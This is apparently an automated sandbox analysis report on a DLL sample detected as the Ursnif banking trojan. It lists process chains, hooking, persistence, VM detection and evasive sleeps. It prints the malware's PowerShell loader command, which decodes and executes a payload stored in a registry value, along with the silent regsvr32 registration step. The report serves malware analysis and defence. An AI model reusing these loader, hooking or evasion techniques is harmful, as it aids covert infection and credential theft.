Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NJPcHPuRcG.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp

Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0542556E

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277AF23 push ecx; ret	2_2_0277AF33
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277ABF0 push ecx; ret	2_2_0277ABF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0542769F push ecx; ret	2_2_054276AF

Source: initial sample

Static PE information: section name: .text entropy: 6.87914884899

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5156
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3564

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520

Thread sleep time: -9223372036854770s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_0540834C

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_054016E1

Source: explorer.exe, 00000024.00000002.616609988.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
